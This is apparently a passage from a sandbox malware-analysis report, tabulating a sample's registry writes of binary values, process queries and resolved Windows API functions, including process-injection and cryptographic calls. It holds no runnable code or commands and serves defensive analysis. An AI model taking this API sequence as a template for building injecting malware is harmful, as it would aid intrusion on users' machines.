Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	2	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data

Process (907)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\windows mail\groups.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows photo viewer\filesdetectedlosebenjamin.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\mozilla firefox\cincinnati consumers se.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\common files\simply_wa_thumbnail_programmers.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\dvd maker\medicaid.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\java\gateway.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows nt\laden.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\windows media player\lying-yourself.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows nt\disclaimer_saudi_agreed_oem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\adobe\colleague wrap.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\hottest-jm-depression-fought.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\google\saturday.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\sppsvc.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\sdclt.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\windows mail\groups.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\windows photo viewer\filesdetectedlosebenjamin.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\mozilla firefox\cincinnati consumers se.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\common files\simply_wa_thumbnail_programmers.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\dvd maker\medicaid.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\java\gateway.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\windows nt\laden.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\windows media player\lying-yourself.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\windows nt\disclaimer_saudi_agreed_oem.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\adobe\colleague wrap.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\microsoft office\hottest-jm-depression-fought.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files (x86)\google\saturday.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\system32\sdclt.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\windows mail\groups.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\windows photo viewer\filesdetectedlosebenjamin.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\mozilla firefox\cincinnati consumers se.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\common files\simply_wa_thumbnail_programmers.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\dvd maker\medicaid.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\java\gateway.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\windows nt\laden.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files (x86)\windows media player\lying-yourself.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\program files\windows nt\disclaimer_saudi_agreed_oem.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\program files (x86)\adobe\colleague wrap.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\program files\microsoft office\hottest-jm-depression-fought.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\program files (x86)\google\saturday.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\sdclt.exe	desired_access = PROCESS_QUERY_INFORMATION	13	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_QUERY_INFORMATION	3	Fn

Module (228)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759f0000	1	Fn
Load	USER32.dll	base_address = 0x75790000	1	Fn
Load	CRYPT32.dll	base_address = 0x758d0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x756e0000	1	Fn
Load	SHELL32.dll	base_address = 0x75c50000	1	Fn
Load	SHLWAPI.dll	base_address = 0x750d0000	1	Fn
Load	PSAPI.DLL	base_address = 0x74eb0000	1	Fn
Load	ole32.dll	base_address = 0x75450000	1	Fn
Load	GDI32.dll	base_address = 0x75130000	1	Fn
Load	WININET.dll	base_address = 0x75350000	1	Fn
Load	urlmon.dll	base_address = 0x76c40000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76b60000	1	Fn
Load	Secur32.dll	base_address = 0x748e0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77270000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x75a07a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75a049d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a089b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x772b1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x75a110b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a034d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7729e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x75a035b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x75a1d9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a02d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x772a45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a0dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x75a05a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a0103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a0170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x75a01400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x75a05a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x75a1d9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x75a2d075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75a1d5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x75a05151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75a1ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a017ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a0469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a01b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75a01ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x75a01886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x772e742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a07a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a2830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75a03e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x75a0195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x75a1d851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x75a25c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x75a2c7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a8416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a8414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a841df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a840fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a05371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75a0418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x75a044ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a23b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75a01b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a017d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x772a2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x75a0465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a0192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75a1d4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a01986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x75a04407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x75a0111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77292270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a04950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75a1ecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a844cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a01856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x75a04173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a01282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x772922b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75a01b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75a04442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x75a015d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x75a1d4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a011a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a014c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75a04a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x75a1d9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75a059e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x75a01462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75a1c860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a03ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a04259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a034c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a034b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a01222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a0492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75a28baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75a2896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a2735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a03f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75a0424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x75a016dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a01410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x75a016c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a010ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a0183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a01136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x75a04220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a0110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a0186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x757b49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x757b8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x757afbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x757b1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x772a25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x757a8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x757a9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x757b2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x757b3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75801a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x757a7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757b05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x757a787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x757ab17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x757b6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x757ad156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x757af350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x757a9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x758dd718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x756f469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x756f45f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7570779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x756f0e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x756f40e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x756f0e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x756f2a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x756f40fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x756ec54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x756e9fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x756ef4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x756edf4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x756edf36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x756f4680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x756f14d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x756edf66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x756f4304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x756f412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x756f4620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x756f468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x756ec532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x756f432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x756f46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x756ee124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x756f431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x756ec51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x756f418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x756f415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x756f4608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x756f41b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x756f413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x756ecf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7570773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x756ee15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x756f46e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x756f445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7573db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x756edf14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x75c63c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75c71e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x75cd5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x750e45bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x750e55bf	1	Fn
